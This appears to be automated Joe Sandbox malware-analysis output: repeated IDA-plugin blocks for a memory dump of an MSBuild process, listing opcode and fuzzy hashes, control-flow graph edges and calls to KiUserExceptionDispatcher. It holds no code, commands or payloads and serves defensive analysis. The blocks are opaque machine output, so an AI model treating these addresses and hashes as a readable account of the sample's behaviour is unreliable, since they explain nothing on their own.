                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: ab08d91878576715dc844de2c062f950810535140e423a3d609d93edc8edbcf1
                                                                                    • Instruction ID: 0a7a15a8108752584cb73b0e9ab18d435c2df61e3f3afcc6baf6a46d2f659282
                                                                                    • Opcode Fuzzy Hash: ab08d91878576715dc844de2c062f950810535140e423a3d609d93edc8edbcf1
                                                                                    • Instruction Fuzzy Hash: 00028474902298CFDBA9EF70D88869DB7B2FF49306F1045E9D50AA6250CB399EC1CF51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1014 61e715e-61e71cb 1184 61e71cb call 6828e42 1014->1184 1185 61e71cb call 6828ef0 1014->1185 1021 61e71d1-61e7212 1187 61e7212 call 6829700 1021->1187 1188 61e7212 call 6829b10 1021->1188 1189 61e7212 call 68296f1 1021->1189 1190 61e7212 call 6829b71 1021->1190 1024 61e7218-61e7259 1150 61e7259 call 682a5b0 1024->1150 1151 61e7259 call 682adf6 1024->1151 1152 61e7259 call 682b247 1024->1152 1153 61e7259 call 682a538 1024->1153 1154 61e7259 call 682ad38 1024->1154 1155 61e7259 call 682ad48 1024->1155 1156 61e7259 call 682b1e8 1024->1156 1027 61e725f-61e72a0 1157 61e72a0 call 682c490 1027->1157 1158 61e72a0 call 682c41d 1027->1158 1030 61e72a6-61e72e7 1160 61e72e7 call 682c690 1030->1160 1161 61e72e7 call 682c4a1 1030->1161 1162 61e72e7 call 682c6ef 1030->1162 1033 61e72ed-61e73b3 1163 61e73b3 call 682c7b0 1033->1163 1164 61e73b3 call 682c750 1033->1164 1165 61e73b3 call 682ce00 1033->1165 1166 61e73b3 call 682cd5e 1033->1166 1042 61e73b9-61e73fa 1167 61e73fa call 682dcd0 1042->1167 1168 61e73fa call 682dadf 1042->1168 1045 61e7400-61e7441 1169 61e7441 call 682e020 1045->1169 1170 61e7441 call 682df71 1045->1170 1171 61e7441 call 682e398 1045->1171 1048 61e7447-61e7488 1172 61e7488 call 682e020 1048->1172 1173 61e7488 call 682e970 1048->1173 1174 61e7488 call 682df71 1048->1174 1175 61e7488 call 682e5d7 1048->1175 1176 61e7488 call 682e874 1048->1176 1177 61e7488 call 682e398 1048->1177 1178 61e7488 call 682e9cf 1048->1178 1051 61e748e-61e74cf 1179 61e74cf call 682ea90 1051->1179 1180 61e74cf call 682ea30 1051->1180 1181 61e74cf call 682eaef 1051->1181 1054 61e74d5-61e7516 1182 61e7516 call 682ebb0 1054->1182 1183 61e7516 call 682eb50 1054->1183 1057 61e751c-61e7d7e KiUserExceptionDispatcher call 69b5368 KiUserExceptionDispatcher call 69b57c0 call 69b5bf0 1146 61e7d84-61e7dd5 1057->1146 1150->1027 1151->1027 1152->1027 1153->1027 1154->1027 1155->1027 1156->1027 1157->1030 1158->1030 1160->1033 1161->1033 1162->1033 1163->1042 1164->1042 1165->1042 1166->1042 1167->1045 1168->1045 1169->1048 1170->1048 1171->1048 1172->1051 1173->1051 1174->1051 1175->1051 1176->1051 1177->1051 1178->1051 1179->1054 1180->1054 1181->1054 1182->1057 1183->1057 1184->1021 1185->1021 1187->1024 1188->1024 1189->1024 1190->1024
                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E77DC
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 1648b4ea3b985dddaa916d7ff46bb3088f0f2fe4ebc550add3dc3f8ad7abb495
                                                                                    • Instruction ID: f19960a2f423c1c561a5c8a7e3e2415a766b8ea005638569eea6b0ab51f5fcc9
                                                                                    • Opcode Fuzzy Hash: 1648b4ea3b985dddaa916d7ff46bb3088f0f2fe4ebc550add3dc3f8ad7abb495
                                                                                    • Instruction Fuzzy Hash: 8A0284749022A8CFDBA9EF30D88869DB7B2FF49306F1045E9D50A66250CB399EC1CF51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1191 61e71a5-61e71cb 1358 61e71cb call 6828e42 1191->1358 1359 61e71cb call 6828ef0 1191->1359 1195 61e71d1-61e7212 1361 61e7212 call 6829700 1195->1361 1362 61e7212 call 6829b10 1195->1362 1363 61e7212 call 68296f1 1195->1363 1364 61e7212 call 6829b71 1195->1364 1198 61e7218-61e7259 1324 61e7259 call 682a5b0 1198->1324 1325 61e7259 call 682adf6 1198->1325 1326 61e7259 call 682b247 1198->1326 1327 61e7259 call 682a538 1198->1327 1328 61e7259 call 682ad38 1198->1328 1329 61e7259 call 682ad48 1198->1329 1330 61e7259 call 682b1e8 1198->1330 1201 61e725f-61e72a0 1331 61e72a0 call 682c490 1201->1331 1332 61e72a0 call 682c41d 1201->1332 1204 61e72a6-61e72e7 1334 61e72e7 call 682c690 1204->1334 1335 61e72e7 call 682c4a1 1204->1335 1336 61e72e7 call 682c6ef 1204->1336 1207 61e72ed-61e73b3 1337 61e73b3 call 682c7b0 1207->1337 1338 61e73b3 call 682c750 1207->1338 1339 61e73b3 call 682ce00 1207->1339 1340 61e73b3 call 682cd5e 1207->1340 1216 61e73b9-61e73fa 1341 61e73fa call 682dcd0 1216->1341 1342 61e73fa call 682dadf 1216->1342 1219 61e7400-61e7441 1343 61e7441 call 682e020 1219->1343 1344 61e7441 call 682df71 1219->1344 1345 61e7441 call 682e398 1219->1345 1222 61e7447-61e7488 1346 61e7488 call 682e020 1222->1346 1347 61e7488 call 682e970 1222->1347 1348 61e7488 call 682df71 1222->1348 1349 61e7488 call 682e5d7 1222->1349 1350 61e7488 call 682e874 1222->1350 1351 61e7488 call 682e398 1222->1351 1352 61e7488 call 682e9cf 1222->1352 1225 61e748e-61e74cf 1353 61e74cf call 682ea90 1225->1353 1354 61e74cf call 682ea30 1225->1354 1355 61e74cf call 682eaef 1225->1355 1228 61e74d5-61e7516 1356 61e7516 call 682ebb0 1228->1356 1357 61e7516 call 682eb50 1228->1357 1231 61e751c-61e7d7e KiUserExceptionDispatcher call 69b5368 KiUserExceptionDispatcher call 69b57c0 call 69b5bf0 1320 61e7d84-61e7dd5 1231->1320 1324->1201 1325->1201 1326->1201 1327->1201 1328->1201 1329->1201 1330->1201 1331->1204 1332->1204 1334->1207 1335->1207 1336->1207 1337->1216 1338->1216 1339->1216 1340->1216 1341->1219 1342->1219 1343->1222 1344->1222 1345->1222 1346->1225 1347->1225 1348->1225 1349->1225 1350->1225 1351->1225 1352->1225 1353->1228 1354->1228 1355->1228 1356->1231 1357->1231 1358->1195 1359->1195 1361->1198 1362->1198 1363->1198 1364->1198
                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E77DC
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 2cad95bc90cd91a2c253f3395a2b50cfb6b877feda26987d4d0b2ad33df02653
                                                                                    • Instruction ID: 50b172244b125e90a66a887e663695bbb6b7bb682312ffd259cff65a3eea57d4
                                                                                    • Opcode Fuzzy Hash: 2cad95bc90cd91a2c253f3395a2b50cfb6b877feda26987d4d0b2ad33df02653
                                                                                    • Instruction Fuzzy Hash: F4F184749022A8CFDBA9EF30D88869DB7B2FF49306F1045E9D50A66250CB399EC1CF51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1365 61e71ec-61e7212 1523 61e7212 call 6829700 1365->1523 1524 61e7212 call 6829b10 1365->1524 1525 61e7212 call 68296f1 1365->1525 1526 61e7212 call 6829b71 1365->1526 1369 61e7218-61e7259 1527 61e7259 call 682a5b0 1369->1527 1528 61e7259 call 682adf6 1369->1528 1529 61e7259 call 682b247 1369->1529 1530 61e7259 call 682a538 1369->1530 1531 61e7259 call 682ad38 1369->1531 1532 61e7259 call 682ad48 1369->1532 1533 61e7259 call 682b1e8 1369->1533 1372 61e725f-61e72a0 1496 61e72a0 call 682c490 1372->1496 1497 61e72a0 call 682c41d 1372->1497 1375 61e72a6-61e72e7 1498 61e72e7 call 682c690 1375->1498 1499 61e72e7 call 682c4a1 1375->1499 1500 61e72e7 call 682c6ef 1375->1500 1378 61e72ed-61e73b3 1501 61e73b3 call 682c7b0 1378->1501 1502 61e73b3 call 682c750 1378->1502 1503 61e73b3 call 682ce00 1378->1503 1504 61e73b3 call 682cd5e 1378->1504 1387 61e73b9-61e73fa 1505 61e73fa call 682dcd0 1387->1505 1506 61e73fa call 682dadf 1387->1506 1390 61e7400-61e7441 1507 61e7441 call 682e020 1390->1507 1508 61e7441 call 682df71 1390->1508 1509 61e7441 call 682e398 1390->1509 1393 61e7447-61e7488 1510 61e7488 call 682e020 1393->1510 1511 61e7488 call 682e970 1393->1511 1512 61e7488 call 682df71 1393->1512 1513 61e7488 call 682e5d7 1393->1513 1514 61e7488 call 682e874 1393->1514 1515 61e7488 call 682e398 1393->1515 1516 61e7488 call 682e9cf 1393->1516 1396 61e748e-61e74cf 1517 61e74cf call 682ea90 1396->1517 1518 61e74cf call 682ea30 1396->1518 1519 61e74cf call 682eaef 1396->1519 1399 61e74d5-61e7516 1520 61e7516 call 682ebb0 1399->1520 1521 61e7516 call 682eb50 1399->1521 1402 61e751c-61e7d7e KiUserExceptionDispatcher call 69b5368 KiUserExceptionDispatcher call 69b57c0 call 69b5bf0 1491 61e7d84-61e7dd5 1402->1491 1496->1375 1497->1375 1498->1378 1499->1378 1500->1378 1501->1387 1502->1387 1503->1387 1504->1387 1505->1390 1506->1390 1507->1393 1508->1393 1509->1393 1510->1396 1511->1396 1512->1396 1513->1396 1514->1396 1515->1396 1516->1396 1517->1399 1518->1399 1519->1399 1520->1402 1521->1402 1523->1369 1524->1369 1525->1369 1526->1369 1527->1372 1528->1372 1529->1372 1530->1372 1531->1372 1532->1372 1533->1372
                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E77DC
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 49a972977f64fb68d7db1e55506c3d853039b64933f5de6fb54f62924eca1c8e
                                                                                    • Instruction ID: 4a28587f8c50a1c2171da52adb641c9557775dfdb584e135f07491c0cd5ac5d5
                                                                                    • Opcode Fuzzy Hash: 49a972977f64fb68d7db1e55506c3d853039b64933f5de6fb54f62924eca1c8e
                                                                                    • Instruction Fuzzy Hash: FBF184749022A8CFDBA9EF30D88869DB7B2FF49306F1045E9D50A66250CB399EC1CF51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1534 61e7233-61e7259 1660 61e7259 call 682a5b0 1534->1660 1661 61e7259 call 682adf6 1534->1661 1662 61e7259 call 682b247 1534->1662 1663 61e7259 call 682a538 1534->1663 1664 61e7259 call 682ad38 1534->1664 1665 61e7259 call 682ad48 1534->1665 1666 61e7259 call 682b1e8 1534->1666 1538 61e725f-61e72a0 1669 61e72a0 call 682c490 1538->1669 1670 61e72a0 call 682c41d 1538->1670 1541 61e72a6-61e72e7 1671 61e72e7 call 682c690 1541->1671 1672 61e72e7 call 682c4a1 1541->1672 1673 61e72e7 call 682c6ef 1541->1673 1544 61e72ed-61e73b3 1674 61e73b3 call 682c7b0 1544->1674 1675 61e73b3 call 682c750 1544->1675 1676 61e73b3 call 682ce00 1544->1676 1677 61e73b3 call 682cd5e 1544->1677 1553 61e73b9-61e73fa 1678 61e73fa call 682dcd0 1553->1678 1679 61e73fa call 682dadf 1553->1679 1556 61e7400-61e7441 1680 61e7441 call 682e020 1556->1680 1681 61e7441 call 682df71 1556->1681 1682 61e7441 call 682e398 1556->1682 1559 61e7447-61e7488 1683 61e7488 call 682e020 1559->1683 1684 61e7488 call 682e970 1559->1684 1685 61e7488 call 682df71 1559->1685 1686 61e7488 call 682e5d7 1559->1686 1687 61e7488 call 682e874 1559->1687 1688 61e7488 call 682e398 1559->1688 1689 61e7488 call 682e9cf 1559->1689 1562 61e748e-61e74cf 1690 61e74cf call 682ea90 1562->1690 1691 61e74cf call 682ea30 1562->1691 1692 61e74cf call 682eaef 1562->1692 1565 61e74d5-61e7516 1693 61e7516 call 682ebb0 1565->1693 1694 61e7516 call 682eb50 1565->1694 1568 61e751c-61e7d7e KiUserExceptionDispatcher call 69b5368 KiUserExceptionDispatcher call 69b57c0 call 69b5bf0 1657 61e7d84-61e7dd5 1568->1657 1660->1538 1661->1538 1662->1538 1663->1538 1664->1538 1665->1538 1666->1538 1669->1541 1670->1541 1671->1544 1672->1544 1673->1544 1674->1553 1675->1553 1676->1553 1677->1553 1678->1556 1679->1556 1680->1559 1681->1559 1682->1559 1683->1562 1684->1562 1685->1562 1686->1562 1687->1562 1688->1562 1689->1562 1690->1565 1691->1565 1692->1565 1693->1568 1694->1568
                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E77DC
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 40166e2d3ef8c1378b278ba921ecf8fb5446282c4cc889b0cb45a004237e09fe
                                                                                    • Instruction ID: 86217d6f55f3ab4509dbaf356580714aef050d4f2cff71d3fcd733c07546c5af
                                                                                    • Opcode Fuzzy Hash: 40166e2d3ef8c1378b278ba921ecf8fb5446282c4cc889b0cb45a004237e09fe
                                                                                    • Instruction Fuzzy Hash: B1F184749022A8CFDBA9EF30D88869DB7B2FF49306F1045E9D50A66250CB399EC1CF51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1696 61e727a-61e72a0 1837 61e72a0 call 682c490 1696->1837 1838 61e72a0 call 682c41d 1696->1838 1700 61e72a6-61e72e7 1839 61e72e7 call 682c690 1700->1839 1840 61e72e7 call 682c4a1 1700->1840 1841 61e72e7 call 682c6ef 1700->1841 1703 61e72ed-61e73b3 1842 61e73b3 call 682c7b0 1703->1842 1843 61e73b3 call 682c750 1703->1843 1844 61e73b3 call 682ce00 1703->1844 1845 61e73b3 call 682cd5e 1703->1845 1712 61e73b9-61e73fa 1846 61e73fa call 682dcd0 1712->1846 1847 61e73fa call 682dadf 1712->1847 1715 61e7400-61e7441 1819 61e7441 call 682e020 1715->1819 1820 61e7441 call 682df71 1715->1820 1821 61e7441 call 682e398 1715->1821 1718 61e7447-61e7488 1822 61e7488 call 682e020 1718->1822 1823 61e7488 call 682e970 1718->1823 1824 61e7488 call 682df71 1718->1824 1825 61e7488 call 682e5d7 1718->1825 1826 61e7488 call 682e874 1718->1826 1827 61e7488 call 682e398 1718->1827 1828 61e7488 call 682e9cf 1718->1828 1721 61e748e-61e74cf 1829 61e74cf call 682ea90 1721->1829 1830 61e74cf call 682ea30 1721->1830 1831 61e74cf call 682eaef 1721->1831 1724 61e74d5-61e7516 1832 61e7516 call 682ebb0 1724->1832 1833 61e7516 call 682eb50 1724->1833 1727 61e751c-61e7d7e KiUserExceptionDispatcher call 69b5368 KiUserExceptionDispatcher call 69b57c0 call 69b5bf0 1816 61e7d84-61e7dd5 1727->1816 1819->1718 1820->1718 1821->1718 1822->1721 1823->1721 1824->1721 1825->1721 1826->1721 1827->1721 1828->1721 1829->1724 1830->1724 1831->1724 1832->1727 1833->1727 1837->1700 1838->1700 1839->1703 1840->1703 1841->1703 1842->1712 1843->1712 1844->1712 1845->1712 1846->1715 1847->1715
                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E77DC
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 61053e5359835a62a1931e0e366c1d06cebf81c8201ccfd9476e4fa040f9f8c8
                                                                                    • Instruction ID: 4498436fec9e7a26e6c9ca27c6bdfbde8f08df46e2ddf4b0dd09821ea97268cd
                                                                                    • Opcode Fuzzy Hash: 61053e5359835a62a1931e0e366c1d06cebf81c8201ccfd9476e4fa040f9f8c8
                                                                                    • Instruction Fuzzy Hash: 57F184749022A8CFDBA9EF30D88869DB7B2FF49306F1045E9D50A62250CB399EC1CF51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1848 61e72c1-61e72e7 1986 61e72e7 call 682c690 1848->1986 1987 61e72e7 call 682c4a1 1848->1987 1988 61e72e7 call 682c6ef 1848->1988 1852 61e72ed-61e73b3 1989 61e73b3 call 682c7b0 1852->1989 1990 61e73b3 call 682c750 1852->1990 1991 61e73b3 call 682ce00 1852->1991 1992 61e73b3 call 682cd5e 1852->1992 1861 61e73b9-61e73fa 1993 61e73fa call 682dcd0 1861->1993 1994 61e73fa call 682dadf 1861->1994 1864 61e7400-61e7441 1968 61e7441 call 682e020 1864->1968 1969 61e7441 call 682df71 1864->1969 1970 61e7441 call 682e398 1864->1970 1867 61e7447-61e7488 1971 61e7488 call 682e020 1867->1971 1972 61e7488 call 682e970 1867->1972 1973 61e7488 call 682df71 1867->1973 1974 61e7488 call 682e5d7 1867->1974 1975 61e7488 call 682e874 1867->1975 1976 61e7488 call 682e398 1867->1976 1977 61e7488 call 682e9cf 1867->1977 1870 61e748e-61e74cf 1978 61e74cf call 682ea90 1870->1978 1979 61e74cf call 682ea30 1870->1979 1980 61e74cf call 682eaef 1870->1980 1873 61e74d5-61e7516 1981 61e7516 call 682ebb0 1873->1981 1982 61e7516 call 682eb50 1873->1982 1876 61e751c-61e7d7e KiUserExceptionDispatcher call 69b5368 KiUserExceptionDispatcher call 69b57c0 call 69b5bf0 1965 61e7d84-61e7dd5 1876->1965 1968->1867 1969->1867 1970->1867 1971->1870 1972->1870 1973->1870 1974->1870 1975->1870 1976->1870 1977->1870 1978->1873 1979->1873 1980->1873 1981->1876 1982->1876 1986->1852 1987->1852 1988->1852 1989->1861 1990->1861 1991->1861 1992->1861 1993->1864 1994->1864
                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E77DC
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 734f215b571e6bac1579dfe94d523ebe5118927d9a270f5007df414808298a47
                                                                                    • Instruction ID: beb559de9d77bad993574d42540ee131e0266a4c831b700f8a9a000f3ffb8f16
                                                                                    • Opcode Fuzzy Hash: 734f215b571e6bac1579dfe94d523ebe5118927d9a270f5007df414808298a47
                                                                                    • Instruction Fuzzy Hash: 2FE184749022A8CFDBA9EF34D88869DB7B2FF49306F1045E9D50A66250CB399EC1CF51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1995 61e7308-61e73b3 2114 61e73b3 call 682c7b0 1995->2114 2115 61e73b3 call 682c750 1995->2115 2116 61e73b3 call 682ce00 1995->2116 2117 61e73b3 call 682cd5e 1995->2117 2005 61e73b9-61e73fa 2118 61e73fa call 682dcd0 2005->2118 2119 61e73fa call 682dadf 2005->2119 2008 61e7400-61e7441 2120 61e7441 call 682e020 2008->2120 2121 61e7441 call 682df71 2008->2121 2122 61e7441 call 682e398 2008->2122 2011 61e7447-61e7488 2123 61e7488 call 682e020 2011->2123 2124 61e7488 call 682e970 2011->2124 2125 61e7488 call 682df71 2011->2125 2126 61e7488 call 682e5d7 2011->2126 2127 61e7488 call 682e874 2011->2127 2128 61e7488 call 682e398 2011->2128 2129 61e7488 call 682e9cf 2011->2129 2014 61e748e-61e74cf 2130 61e74cf call 682ea90 2014->2130 2131 61e74cf call 682ea30 2014->2131 2132 61e74cf call 682eaef 2014->2132 2017 61e74d5-61e7516 2133 61e7516 call 682ebb0 2017->2133 2134 61e7516 call 682eb50 2017->2134 2020 61e751c-61e7d7e KiUserExceptionDispatcher call 69b5368 KiUserExceptionDispatcher call 69b57c0 call 69b5bf0 2109 61e7d84-61e7dd5 2020->2109 2114->2005 2115->2005 2116->2005 2117->2005 2118->2008 2119->2008 2120->2011 2121->2011 2122->2011 2123->2014 2124->2014 2125->2014 2126->2014 2127->2014 2128->2014 2129->2014 2130->2017 2131->2017 2132->2017 2133->2020 2134->2020
                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E77DC
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 4a0dc43449e13609401e2477bb2c1debe1ba1eecb16b172c9ac35aed9df2327c
                                                                                    • Instruction ID: a4b93286f8266ac4f51d76a852ea1bbdf5331550957724d63233a995193f0b72
                                                                                    • Opcode Fuzzy Hash: 4a0dc43449e13609401e2477bb2c1debe1ba1eecb16b172c9ac35aed9df2327c
                                                                                    • Instruction Fuzzy Hash: 9EE184349022A8CFDBA9EF30D88869DB7B2FF49306F1045E9D50A66250CB399EC1CF51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2136 61e734f-61e73b3 2250 61e73b3 call 682c7b0 2136->2250 2251 61e73b3 call 682c750 2136->2251 2252 61e73b3 call 682ce00 2136->2252 2253 61e73b3 call 682cd5e 2136->2253 2143 61e73b9-61e73fa 2254 61e73fa call 682dcd0 2143->2254 2255 61e73fa call 682dadf 2143->2255 2146 61e7400-61e7441 2256 61e7441 call 682e020 2146->2256 2257 61e7441 call 682df71 2146->2257 2258 61e7441 call 682e398 2146->2258 2149 61e7447-61e7488 2259 61e7488 call 682e020 2149->2259 2260 61e7488 call 682e970 2149->2260 2261 61e7488 call 682df71 2149->2261 2262 61e7488 call 682e5d7 2149->2262 2263 61e7488 call 682e874 2149->2263 2264 61e7488 call 682e398 2149->2264 2265 61e7488 call 682e9cf 2149->2265 2152 61e748e-61e74cf 2266 61e74cf call 682ea90 2152->2266 2267 61e74cf call 682ea30 2152->2267 2268 61e74cf call 682eaef 2152->2268 2155 61e74d5-61e7516 2269 61e7516 call 682ebb0 2155->2269 2270 61e7516 call 682eb50 2155->2270 2158 61e751c-61e7d7e KiUserExceptionDispatcher call 69b5368 KiUserExceptionDispatcher call 69b57c0 call 69b5bf0 2247 61e7d84-61e7dd5 2158->2247 2250->2143 2251->2143 2252->2143 2253->2143 2254->2146 2255->2146 2256->2149 2257->2149 2258->2149 2259->2152 2260->2152 2261->2152 2262->2152 2263->2152 2264->2152 2265->2152 2266->2155 2267->2155 2268->2155 2269->2158 2270->2158
                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E77DC
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: c0ee21f2b8b90d89e72e139c5fb5a98394d56bdf34ccf55e97ea9563ea341123
                                                                                    • Instruction ID: 2106068fcd9d610a393f4fd95441c8613a884b993f1ce603c2ba2f2542b006b9
                                                                                    • Opcode Fuzzy Hash: c0ee21f2b8b90d89e72e139c5fb5a98394d56bdf34ccf55e97ea9563ea341123
                                                                                    • Instruction Fuzzy Hash: C1E183349022A8CFDBA9EF34D88869DB7B2FF49306F1045E9D50A66250DB399AC1CF51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2274 61e738d-61e73b3 2387 61e73b3 call 682c7b0 2274->2387 2388 61e73b3 call 682c750 2274->2388 2389 61e73b3 call 682ce00 2274->2389 2390 61e73b3 call 682cd5e 2274->2390 2278 61e73b9-61e73fa 2391 61e73fa call 682dcd0 2278->2391 2392 61e73fa call 682dadf 2278->2392 2281 61e7400-61e7441 2393 61e7441 call 682e020 2281->2393 2394 61e7441 call 682df71 2281->2394 2395 61e7441 call 682e398 2281->2395 2284 61e7447-61e7488 2396 61e7488 call 682e020 2284->2396 2397 61e7488 call 682e970 2284->2397 2398 61e7488 call 682df71 2284->2398 2399 61e7488 call 682e5d7 2284->2399 2400 61e7488 call 682e874 2284->2400 2401 61e7488 call 682e398 2284->2401 2402 61e7488 call 682e9cf 2284->2402 2287 61e748e-61e74cf 2403 61e74cf call 682ea90 2287->2403 2404 61e74cf call 682ea30 2287->2404 2405 61e74cf call 682eaef 2287->2405 2290 61e74d5-61e7516 2406 61e7516 call 682ebb0 2290->2406 2407 61e7516 call 682eb50 2290->2407 2293 61e751c-61e7d7e KiUserExceptionDispatcher call 69b5368 KiUserExceptionDispatcher call 69b57c0 call 69b5bf0 2382 61e7d84-61e7dd5 2293->2382 2387->2278 2388->2278 2389->2278 2390->2278 2391->2281 2392->2281 2393->2284 2394->2284 2395->2284 2396->2287 2397->2287 2398->2287 2399->2287 2400->2287 2401->2287 2402->2287 2403->2290 2404->2290 2405->2290 2406->2293 2407->2293
                                                                                    APIs
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E77DC
                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 061E7CEA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000006.00000002.522576829.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_6_2_61e0000_MSBuild.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatcherExceptionUser
                                                                                    • String ID:
                                                                                    • API String ID: 6842923-0
                                                                                    • Opcode ID: 08e8cd837a638203cb9a2bb964ffd4729646c989b4e04d18bacbb412352dccfd
                                                                                    • Instruction ID: c5c8123d5706f68423cdd341b01e12830a762532a227e7db6c107498b99ba3f6
                                                                                    • Opcode Fuzzy Hash: 08e8cd837a638203cb9a2bb964ffd4729646c989b4e04d18bacbb412352dccfd
                                                                                    • Instruction Fuzzy Hash: 6AE18434902298CFDBA9EF34D88869DB7B2FF49306F1045E9D50A66250DB399EC1CF51
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

